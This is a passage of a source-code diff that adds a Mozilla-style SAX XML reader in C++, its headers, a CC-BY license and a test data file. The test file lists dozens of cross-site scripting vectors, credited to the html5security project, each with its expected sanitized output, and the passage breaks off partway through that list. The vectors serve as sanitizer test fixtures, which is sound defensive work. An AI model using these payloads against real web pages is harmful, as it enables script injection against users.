available) + break; // blocking input stream has none available when done + + if (available > UINT32_MAX) + available = UINT32_MAX; + + rv = mListener->OnDataAvailable(parserChannel, nullptr, + aStream, + offset, + (uint32_t)available); + if (NS_SUCCEEDED(rv)) + offset += available; + else + parserChannel->Cancel(rv); + parserChannel->GetStatus(&status); + } + rv = mListener->OnStopRequest(parserChannel, nullptr, status); + mListener = nullptr; + + return rv; +} + +NS_IMETHODIMP +nsSAXXMLReader::ParseAsync(nsIRequestObserver *aObserver) +{ + mParserObserver = aObserver; + mIsAsyncParse = true; + return NS_OK; +} + +// nsIRequestObserver + +NS_IMETHODIMP +nsSAXXMLReader::OnStartRequest(nsIRequest *aRequest, nsISupports *aContext) +{ + NS_ENSURE_TRUE(mIsAsyncParse, NS_ERROR_FAILURE); + nsresult rv; + rv = EnsureBaseURI(); + NS_ENSURE_SUCCESS(rv, rv); + nsCOMPtr<nsIChannel> channel = do_QueryInterface(aRequest); + rv = InitParser(mParserObserver, channel); + NS_ENSURE_SUCCESS(rv, rv); + // we don't need or want this anymore + mParserObserver = nullptr; + return mListener->OnStartRequest(aRequest, aContext); +} + +NS_IMETHODIMP +nsSAXXMLReader::OnStopRequest(nsIRequest *aRequest, nsISupports *aContext, + nsresult status) +{ + NS_ENSURE_TRUE(mIsAsyncParse, NS_ERROR_FAILURE); + NS_ENSURE_STATE(mListener); + nsresult rv = mListener->OnStopRequest(aRequest, aContext, status); + mListener = nullptr; + mIsAsyncParse = false; + return rv; +} + +// nsIStreamListener + +NS_IMETHODIMP +nsSAXXMLReader::OnDataAvailable(nsIRequest *aRequest, nsISupports *aContext, + nsIInputStream *aInputStream, uint64_t offset, + uint32_t count) +{ + NS_ENSURE_TRUE(mIsAsyncParse, NS_ERROR_FAILURE); + NS_ENSURE_STATE(mListener); + return mListener->OnDataAvailable(aRequest, aContext, aInputStream, offset, + count); +} + +nsresult +nsSAXXMLReader::InitParser(nsIRequestObserver *aObserver, nsIChannel *aChannel) +{ + nsresult rv; + + // setup the parser + nsCOMPtr<nsIParser> parser = 
do_CreateInstance(kParserCID, &rv); + NS_ENSURE_SUCCESS(rv, rv); + + parser->SetContentSink(this); + + int32_t charsetSource = kCharsetFromDocTypeDefault; + nsAutoCString charset(NS_LITERAL_CSTRING("UTF-8")); + TryChannelCharset(aChannel, charsetSource, charset); + parser->SetDocumentCharset(charset, charsetSource); + + rv = parser->Parse(mBaseURI, aObserver); + NS_ENSURE_SUCCESS(rv, rv); + + mListener = do_QueryInterface(parser, &rv); + + return rv; +} + +// from nsDocument.cpp +bool +nsSAXXMLReader::TryChannelCharset(nsIChannel *aChannel, + int32_t& aCharsetSource, + nsACString& aCharset) +{ + if (aCharsetSource >= kCharsetFromChannel) + return true; + + if (aChannel) { + nsAutoCString charsetVal; + nsresult rv = aChannel->GetContentCharset(charsetVal); + if (NS_SUCCEEDED(rv)) { + nsAutoCString preferred; + if (!EncodingUtils::FindEncodingForLabel(charsetVal, preferred)) + return false; + + aCharset = preferred; + aCharsetSource = kCharsetFromChannel; + return true; + } + } + + return false; +} + +nsresult +nsSAXXMLReader::EnsureBaseURI() +{ + if (mBaseURI) + return NS_OK; + + return NS_NewURI(getter_AddRefs(mBaseURI), "about:blank"); +} + +nsresult +nsSAXXMLReader::SplitExpatName(const char16_t *aExpatName, + nsString &aURI, + nsString &aLocalName, + nsString &aQName) +{ + /** + * Adapted from RDFContentSinkImpl + * + * Expat can send the following: + * localName + * namespaceURI<separator>localName + * namespaceURI<separator>localName<separator>prefix + * + * and we use 0xFFFF for the <separator>. 
+ * + */ + + NS_ASSERTION(aExpatName, "null passed to handler"); + nsDependentString expatStr(aExpatName); + int32_t break1, break2 = kNotFound; + break1 = expatStr.FindChar(char16_t(0xFFFF)); + + if (break1 == kNotFound) { + aLocalName = expatStr; // no namespace + aURI.Truncate(); + aQName = expatStr; + } else { + aURI = StringHead(expatStr, break1); + break2 = expatStr.FindChar(char16_t(0xFFFF), break1 + 1); + if (break2 == kNotFound) { // namespace, but no prefix + aLocalName = Substring(expatStr, break1 + 1); + aQName = aLocalName; + } else { // namespace with prefix + aLocalName = Substring(expatStr, break1 + 1, break2 - break1 - 1); + aQName = Substring(expatStr, break2 + 1) + + NS_LITERAL_STRING(":") + aLocalName; + } + } + + return NS_OK; +} diff --git a/parser/xml/nsSAXXMLReader.h b/parser/xml/nsSAXXMLReader.h new file mode 100644 index 000000000..763f787e5 --- /dev/null +++ b/parser/xml/nsSAXXMLReader.h @@ -0,0 +1,105 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. 
*/ + +#ifndef nsSAXXMLReader_h__ +#define nsSAXXMLReader_h__ + +#include "nsCOMPtr.h" +#include "nsIContentSink.h" +#include "nsIExtendedExpatSink.h" +#include "nsIParser.h" +#include "nsIURI.h" +#include "nsISAXXMLReader.h" +#include "nsISAXContentHandler.h" +#include "nsISAXDTDHandler.h" +#include "nsISAXErrorHandler.h" +#include "nsISAXLexicalHandler.h" +#include "nsIMozSAXXMLDeclarationHandler.h" +#include "nsCycleCollectionParticipant.h" +#include "mozilla/Attributes.h" + +#define NS_SAXXMLREADER_CONTRACTID "@mozilla.org/saxparser/xmlreader;1" +#define NS_SAXXMLREADER_CID \ +{ 0xab1da296, 0x6125, 0x40ba, \ +{ 0x96, 0xd0, 0x47, 0xa8, 0x28, 0x2a, 0xe3, 0xdb} } + +class nsSAXXMLReader final : public nsISAXXMLReader, + public nsIExtendedExpatSink, + public nsIContentSink +{ +public: + NS_DECL_CYCLE_COLLECTING_ISUPPORTS + NS_DECL_CYCLE_COLLECTION_CLASS_AMBIGUOUS(nsSAXXMLReader, nsISAXXMLReader) + NS_DECL_NSIEXPATSINK + NS_DECL_NSIEXTENDEDEXPATSINK + NS_DECL_NSISAXXMLREADER + NS_DECL_NSIREQUESTOBSERVER + NS_DECL_NSISTREAMLISTENER + + nsSAXXMLReader(); + + //nsIContentSink + NS_IMETHOD WillParse() override + { + return NS_OK; + } + + NS_IMETHOD WillBuildModel(nsDTDMode aDTDMode) override; + NS_IMETHOD DidBuildModel(bool aTerminated) override; + NS_IMETHOD SetParser(nsParserBase* aParser) override; + + NS_IMETHOD WillInterrupt() override + { + return NS_OK; + } + + NS_IMETHOD WillResume() override + { + return NS_OK; + } + + virtual void FlushPendingNotifications(mozFlushType aType) override + { + } + + NS_IMETHOD SetDocumentCharset(nsACString& aCharset) override + { + return NS_OK; + } + + virtual nsISupports *GetTarget() override + { + return nullptr; + } + +private: + ~nsSAXXMLReader() {} + + nsCOMPtr<nsISAXContentHandler> mContentHandler; + nsCOMPtr<nsISAXDTDHandler> mDTDHandler; + nsCOMPtr<nsISAXErrorHandler> mErrorHandler; + nsCOMPtr<nsISAXLexicalHandler> mLexicalHandler; + nsCOMPtr<nsIMozSAXXMLDeclarationHandler> mDeclarationHandler; + nsCOMPtr<nsIURI> 
mBaseURI; + nsCOMPtr<nsIStreamListener> mListener; + nsCOMPtr<nsIRequestObserver> mParserObserver; + bool mIsAsyncParse; + static bool TryChannelCharset(nsIChannel *aChannel, + int32_t& aCharsetSource, + nsACString& aCharset); + nsresult EnsureBaseURI(); + nsresult InitParser(nsIRequestObserver *aListener, nsIChannel *aChannel); + nsresult SplitExpatName(const char16_t *aExpatName, + nsString &aURI, + nsString &aLocalName, + nsString &aQName); + nsString mPublicId; + nsString mSystemId; + + // Feature flags + bool mEnableNamespacePrefixes; +}; + +#endif // nsSAXXMLReader_h__ diff --git a/parser/xml/test/moz.build b/parser/xml/test/moz.build new file mode 100644 index 000000000..20c00e9aa --- /dev/null +++ b/parser/xml/test/moz.build @@ -0,0 +1,8 @@ +# -*- Mode: python; indent-tabs-mode: nil; tab-width: 40 -*- +# vim: set filetype=python: +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, You can obtain one at http://mozilla.org/MPL/2.0/. + +# Note: set the test module's name to test_<yourmodule> +XPCSHELL_TESTS_MANIFESTS += ['unit/xpcshell.ini'] diff --git a/parser/xml/test/unit/CC-BY-LICENSE b/parser/xml/test/unit/CC-BY-LICENSE new file mode 100644 index 000000000..d0ce194dc --- /dev/null +++ b/parser/xml/test/unit/CC-BY-LICENSE @@ -0,0 +1,59 @@ +Creative Commons Attribution 3.0 Unported License + +THE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS PUBLIC LICENSE ("CCPL" OR "LICENSE"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR OTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS LICENSE OR COPYRIGHT LAW IS PROHIBITED. + +BY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO BE BOUND BY THE TERMS OF THIS LICENSE. TO THE EXTENT THIS LICENSE MAY BE CONSIDERED TO BE A CONTRACT, THE LICENSOR GRANTS YOU THE RIGHTS CONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS. 
+ +1. Definitions + + "Adaptation" means a work based upon the Work, or upon the Work and other pre-existing works, such as a translation, adaptation, derivative work, arrangement of music or other alterations of a literary or artistic work, or phonogram or performance and includes cinematographic adaptations or any other form in which the Work may be recast, transformed, or adapted including in any form recognizably derived from the original, except that a work that constitutes a Collection will not be considered an Adaptation for the purpose of this License. For the avoidance of doubt, where the Work is a musical work, performance or phonogram, the synchronization of the Work in timed-relation with a moving image ("synching") will be considered an Adaptation for the purpose of this License. + "Collection" means a collection of literary or artistic works, such as encyclopedias and anthologies, or performances, phonograms or broadcasts, or other works or subject matter other than works listed in Section 1(f) below, which, by reason of the selection and arrangement of their contents, constitute intellectual creations, in which the Work is included in its entirety in unmodified form along with one or more other contributions, each constituting separate and independent works in themselves, which together are assembled into a collective whole. A work that constitutes a Collection will not be considered an Adaptation (as defined above) for the purposes of this License. + "Distribute" means to make available to the public the original and copies of the Work or Adaptation, as appropriate, through sale or other transfer of ownership. + "Licensor" means the individual, individuals, entity or entities that offer(s) the Work under the terms of this License. 
+ "Original Author" means, in the case of a literary or artistic work, the individual, individuals, entity or entities who created the Work or if no individual or entity can be identified, the publisher; and in addition (i) in the case of a performance the actors, singers, musicians, dancers, and other persons who act, sing, deliver, declaim, play in, interpret or otherwise perform literary or artistic works or expressions of folklore; (ii) in the case of a phonogram the producer being the person or legal entity who first fixes the sounds of a performance or other sounds; and, (iii) in the case of broadcasts, the organization that transmits the broadcast. + "Work" means the literary and/or artistic work offered under the terms of this License including without limitation any production in the literary, scientific and artistic domain, whatever may be the mode or form of its expression including digital form, such as a book, pamphlet and other writing; a lecture, address, sermon or other work of the same nature; a dramatic or dramatico-musical work; a choreographic work or entertainment in dumb show; a musical composition with or without words; a cinematographic work to which are assimilated works expressed by a process analogous to cinematography; a work of drawing, painting, architecture, sculpture, engraving or lithography; a photographic work to which are assimilated works expressed by a process analogous to photography; a work of applied art; an illustration, map, plan, sketch or three-dimensional work relative to geography, topography, architecture or science; a performance; a broadcast; a phonogram; a compilation of data to the extent it is protected as a copyrightable work; or a work performed by a variety or circus performer to the extent it is not otherwise considered a literary or artistic work. 
+ "You" means an individual or entity exercising rights under this License who has not previously violated the terms of this License with respect to the Work, or who has received express permission from the Licensor to exercise rights under this License despite a previous violation. + "Publicly Perform" means to perform public recitations of the Work and to communicate to the public those public recitations, by any means or process, including by wire or wireless means or public digital performances; to make available to the public Works in such a way that members of the public may access these Works from a place and at a place individually chosen by them; to perform the Work to the public by any means or process and the communication to the public of the performances of the Work, including by public digital performance; to broadcast and rebroadcast the Work by any means including signs, sounds or images. + "Reproduce" means to make copies of the Work by any means including without limitation by sound or visual recordings and the right of fixation and reproducing fixations of the Work, including storage of a protected performance or phonogram in digital form or other electronic medium. + +2. Fair Dealing Rights. Nothing in this License is intended to reduce, limit, or restrict any uses free from copyright or rights arising from limitations or exceptions that are provided for in connection with the copyright protection under copyright law or other applicable laws. + +3. License Grant. 
Subject to the terms and conditions of this License, Licensor hereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for the duration of the applicable copyright) license to exercise the rights in the Work as stated below: + + to Reproduce the Work, to incorporate the Work into one or more Collections, and to Reproduce the Work as incorporated in the Collections; + to create and Reproduce Adaptations provided that any such Adaptation, including any translation in any medium, takes reasonable steps to clearly label, demarcate or otherwise identify that changes were made to the original Work. For example, a translation could be marked "The original work was translated from English to Spanish," or a modification could indicate "The original work has been modified."; + to Distribute and Publicly Perform the Work including as incorporated in Collections; and, + to Distribute and Publicly Perform Adaptations. + + For the avoidance of doubt: + Non-waivable Compulsory License Schemes. In those jurisdictions in which the right to collect royalties through any statutory or compulsory licensing scheme cannot be waived, the Licensor reserves the exclusive right to collect such royalties for any exercise by You of the rights granted under this License; + Waivable Compulsory License Schemes. In those jurisdictions in which the right to collect royalties through any statutory or compulsory licensing scheme can be waived, the Licensor waives the exclusive right to collect such royalties for any exercise by You of the rights granted under this License; and, + Voluntary License Schemes. The Licensor waives the right to collect royalties, whether individually or, in the event that the Licensor is a member of a collecting society that administers voluntary licensing schemes, via that society, from any exercise by You of the rights granted under this License. + +The above rights may be exercised in all media and formats whether now known or hereafter devised. 
The above rights include the right to make such modifications as are technically necessary to exercise the rights in other media and formats. Subject to Section 8(f), all rights not expressly granted by Licensor are hereby reserved. + +4. Restrictions. The license granted in Section 3 above is expressly made subject to and limited by the following restrictions: + + You may Distribute or Publicly Perform the Work only under the terms of this License. You must include a copy of, or the Uniform Resource Identifier (URI) for, this License with every copy of the Work You Distribute or Publicly Perform. You may not offer or impose any terms on the Work that restrict the terms of this License or the ability of the recipient of the Work to exercise the rights granted to that recipient under the terms of the License. You may not sublicense the Work. You must keep intact all notices that refer to this License and to the disclaimer of warranties with every copy of the Work You Distribute or Publicly Perform. When You Distribute or Publicly Perform the Work, You may not impose any effective technological measures on the Work that restrict the ability of a recipient of the Work from You to exercise the rights granted to that recipient under the terms of the License. This Section 4(a) applies to the Work as incorporated in a Collection, but this does not require the Collection apart from the Work itself to be made subject to the terms of this License. If You create a Collection, upon notice from any Licensor You must, to the extent practicable, remove from the Collection any credit as required by Section 4(b), as requested. If You create an Adaptation, upon notice from any Licensor You must, to the extent practicable, remove from the Adaptation any credit as required by Section 4(b), as requested. 
+ If You Distribute, or Publicly Perform the Work or any Adaptations or Collections, You must, unless a request has been made pursuant to Section 4(a), keep intact all copyright notices for the Work and provide, reasonable to the medium or means You are utilizing: (i) the name of the Original Author (or pseudonym, if applicable) if supplied, and/or if the Original Author and/or Licensor designate another party or parties (e.g., a sponsor institute, publishing entity, journal) for attribution ("Attribution Parties") in Licensor's copyright notice, terms of service or by other reasonable means, the name of such party or parties; (ii) the title of the Work if supplied; (iii) to the extent reasonably practicable, the URI, if any, that Licensor specifies to be associated with the Work, unless such URI does not refer to the copyright notice or licensing information for the Work; and (iv) , consistent with Section 3(b), in the case of an Adaptation, a credit identifying the use of the Work in the Adaptation (e.g., "French translation of the Work by Original Author," or "Screenplay based on original Work by Original Author"). The credit required by this Section 4 (b) may be implemented in any reasonable manner; provided, however, that in the case of a Adaptation or Collection, at a minimum such credit will appear, if a credit for all contributing authors of the Adaptation or Collection appears, then as part of these credits and in a manner at least as prominent as the credits for the other contributing authors. 
For the avoidance of doubt, You may only use the credit required by this Section for the purpose of attribution in the manner set out above and, by exercising Your rights under this License, You may not implicitly or explicitly assert or imply any connection with, sponsorship or endorsement by the Original Author, Licensor and/or Attribution Parties, as appropriate, of You or Your use of the Work, without the separate, express prior written permission of the Original Author, Licensor and/or Attribution Parties. + Except as otherwise agreed in writing by the Licensor or as may be otherwise permitted by applicable law, if You Reproduce, Distribute or Publicly Perform the Work either by itself or as part of any Adaptations or Collections, You must not distort, mutilate, modify or take other derogatory action in relation to the Work which would be prejudicial to the Original Author's honor or reputation. Licensor agrees that in those jurisdictions (e.g. Japan), in which any exercise of the right granted in Section 3(b) of this License (the right to make Adaptations) would be deemed to be a distortion, mutilation, modification or other derogatory action prejudicial to the Original Author's honor and reputation, the Licensor will waive or not assert, as appropriate, this Section, to the fullest extent permitted by the applicable national law, to enable You to reasonably exercise Your right under Section 3(b) of this License (right to make Adaptations) but not otherwise. + +5. Representations, Warranties and Disclaimer + +UNLESS OTHERWISE MUTUALLY AGREED TO BY THE PARTIES IN WRITING, LICENSOR OFFERS THE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND CONCERNING THE WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING, WITHOUT LIMITATION, WARRANTIES OF TITLE, MERCHANTIBILITY, FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT, OR THE ABSENCE OF LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OF ABSENCE OF ERRORS, WHETHER OR NOT DISCOVERABLE. 
SOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY TO YOU. + +6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW, IN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES ARISING OUT OF THIS LICENSE OR THE USE OF THE WORK, EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. + +7. Termination + + This License and the rights granted hereunder will terminate automatically upon any breach by You of the terms of this License. Individuals or entities who have received Adaptations or Collections from You under this License, however, will not have their licenses terminated provided such individuals or entities remain in full compliance with those licenses. Sections 1, 2, 5, 6, 7, and 8 will survive any termination of this License. + Subject to the above terms and conditions, the license granted here is perpetual (for the duration of the applicable copyright in the Work). Notwithstanding the above, Licensor reserves the right to release the Work under different license terms or to stop distributing the Work at any time; provided, however that any such election will not serve to withdraw this License (or any other license that has been, or is required to be, granted under the terms of this License), and this License will continue in full force and effect unless terminated as stated above. + +8. Miscellaneous + + Each time You Distribute or Publicly Perform the Work or a Collection, the Licensor offers to the recipient a license to the Work on the same terms and conditions as the license granted to You under this License. + Each time You Distribute or Publicly Perform an Adaptation, Licensor offers to the recipient a license to the original Work on the same terms and conditions as the license granted to You under this License. 
+ If any provision of this License is invalid or unenforceable under applicable law, it shall not affect the validity or enforceability of the remainder of the terms of this License, and without further action by the parties to this agreement, such provision shall be reformed to the minimum extent necessary to make such provision valid and enforceable. + No term or provision of this License shall be deemed waived and no breach consented to unless such waiver or consent shall be in writing and signed by the party to be charged with such waiver or consent. + This License constitutes the entire agreement between the parties with respect to the Work licensed here. There are no understandings, agreements or representations with respect to the Work not specified here. Licensor shall not be bound by any additional provisions that may appear in any communication from You. This License may not be modified without the mutual written agreement of the Licensor and You. + The rights granted under, and the subject matter referenced, in this License were drafted utilizing the terminology of the Berne Convention for the Protection of Literary and Artistic Works (as amended on September 28, 1979), the Rome Convention of 1961, the WIPO Copyright Treaty of 1996, the WIPO Performances and Phonograms Treaty of 1996 and the Universal Copyright Convention (as revised on July 24, 1971). These rights and subject matter take effect in the relevant jurisdiction in which the License terms are sought to be enforced according to the corresponding provisions of the implementation of those treaty provisions in the applicable national law. If the standard suite of rights granted under applicable copyright law includes additional rights not granted under this License, such additional rights are deemed to be included in the License; this License is not intended to restrict the license of any rights under applicable law. 
diff --git a/parser/xml/test/unit/results.js b/parser/xml/test/unit/results.js new file mode 100644 index 000000000..2a7735363 --- /dev/null +++ b/parser/xml/test/unit/results.js @@ -0,0 +1,844 @@ +// vectors by the html5security project (https://code.google.com/p/html5security/ & Creative Commons 3.0 BY), see CC-BY-LICENSE for the full license + +var vectors = [ + { + "data": "<form id=\"test\"></form><button form=\"test\" formaction=\"javascript:alert(1)\">X</button>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<meta charset=\"x-imap4-modified-utf7\">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi", + "sanitized": "<html><head></head><body>&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi</body></html>" + }, + { + "data": "<meta charset=\"x-imap4-modified-utf7\">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>", + "sanitized": "<html><head></head><body>&alert&A7&(1)&R&UA;&&<&A9&11/script&X&></body></html>" + }, + { + "data": "0?<script>Worker(\"#\").onmessage=message=>eval(message.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))", + "sanitized": "<html><head></head><body>0? 
:postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))</body></html>" + }, + { + "data": "<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<input onfocus=write(1) autofocus>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<input onblur=write(1) autofocus><input autofocus>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<a style=\"-o-link:'javascript:alert(1)';-o-link-source:current\">X</a>", + "sanitized": "<html><head></head><body><a>X</a></body></html>" + }, + { + "data": "<video poster=javascript:alert(1)//></video>", + "sanitized": "<html><head></head><body><video poster=\"javascript:alert(1)//\" controls=\"controls\"></video></body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\"><g onload=\"javascript:alert(1)\"></g></svg>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>", + "sanitized": "<html><head></head><body><br><br><br><br><br><br>...<br><br><br><br></body></html>" + }, + { + "data": "<x repeat=\"template\" repeat-start=\"999999\">0<y repeat=\"template\" repeat-start=\"999999\">1</y></x>", + "sanitized": "<html><head></head><body>01</body></html>" + }, + { + "data": "<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<script>({0:#0=alert/#0#/#0#(0)})</script>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >", + "sanitized": "<html><head></head><body>X</body></html>" + }, + { + "data": 
"<?xml-stylesheet href=\"javascript:alert(1)\"?><root/>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<script xmlns=\"http://www.w3.org/1999/xhtml\">alert(1)</script>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<meta charset=\"x-mac-farsi\">�script �alert(1)//�/script �", + "sanitized": "<html><head></head><body>�script �alert(1)//�/script �</body></html>" + }, + { + "data": "<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<input onblur=focus() autofocus><input>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>", + "sanitized": "<html><head></head><body>1</body></html>" + }, + { + "data": "<script src=\"#\">{alert(1)}</script>;1", + "sanitized": "<html><head></head><body>;1</body></html>" + }, + { + "data": "+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);", + "sanitized": "<html><head></head><body>+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);</body></html>" + }, + { + "data": "<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": 
"1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>", + "sanitized": "<html><head></head><body>1</body></html>" + }, + { + "data": "<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<style>@import \"data:,*%7bx:expression(write(1))%7D\";</style>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<frameset onload=alert(1)>", + "sanitized": "<html><head></head></html>" + }, + { + "data": "<table background=\"javascript:alert(1)\"></table>", + "sanitized": "<html><head></head><body><table></table></body></html>" + }, + { + "data": "<a style=\"pointer-events:none;position:absolute;\"><a style=\"position:absolute;\" onclick=\"alert(1);\">XXX</a></a><a href=\"javascript:alert(2)\">XXX</a>", + "sanitized": "<html><head></head><body><a></a><a>XXX</a><a>XXX</a></body></html>" + }, + { + "data": "1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>", + "sanitized": "<html><head></head><body>1</body></html>" + }, + { + "data": "1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>", + "sanitized": "<html><head></head><body>1<a href=\"#\"></a></body></html>" + }, + { + "data": "<a style=\"behavior:url(#default#AnchorClick);\" folder=\"javascript:alert(1)\">XXX</a>", + "sanitized": "<html><head></head><body><a>XXX</a></body></html>" + }, + { + "data": "<!--<img src=\"--><img src=x onerror=alert(1)//\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<comment><img src=\"</comment><img src=x onerror=alert(1)//\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<!-- up to 
Opera 11.52, FF 3.6.28 -->\r\n<![><img src=\"]><img src=x onerror=alert(1)//\">\r\n\r\n<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ -->\r\n<svg><![CDATA[><image xlink:href=\"]]><img src=xx:x onerror=alert(2)//\"></svg>", + "sanitized": "<html><head></head><body><img>\n\n\n><image xlink:href=\"<img></body></html>" + }, + { + "data": "<style><img src=\"</style><img src=x onerror=alert(1)//\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<li style=list-style:url() onerror=alert(1)></li>\n<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>", + "sanitized": "<html><head></head><body><li></li>\n<div></div></body></html>" + }, + { + "data": "<head><base href=\"javascript://\"/></head><body><a href=\"/. /,alert(1)//#\">XXX</a></body>", + "sanitized": "<html><head></head><body><a>XXX</a></body></html>" + }, + { + "data": "<?xml version=\"1.0\" standalone=\"no\"?>\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<style type=\"text/css\">\r\n@font-face {font-family: y; src: url(\"font.svg#x\") format(\"svg\");} body {font: 100px \"y\";}\r\n</style>\r\n</head>\r\n<body>Hello</body>\r\n</html>", + "sanitized": "<html><head>\n\n</head>\n<body>Hello\n</body></html>" + }, + { + "data": "<style>*[{}@import'test.css?]{color: green;}</style>X", + "sanitized": "<html><head></head><body>X</body></html>" + }, + { + "data": "<div style=\"font-family:'foo[a];color:red;';\">XXX</div>", + "sanitized": "<html><head></head><body><div>XXX</div></body></html>" + }, + { + "data": "<div style=\"font-family:foo}color=red;\">XXX</div>", + "sanitized": "<html><head></head><body><div>XXX</div></body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\"><script>alert(1)</script></svg>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>", + "sanitized": "<html><head></head><body></body></html>" + 
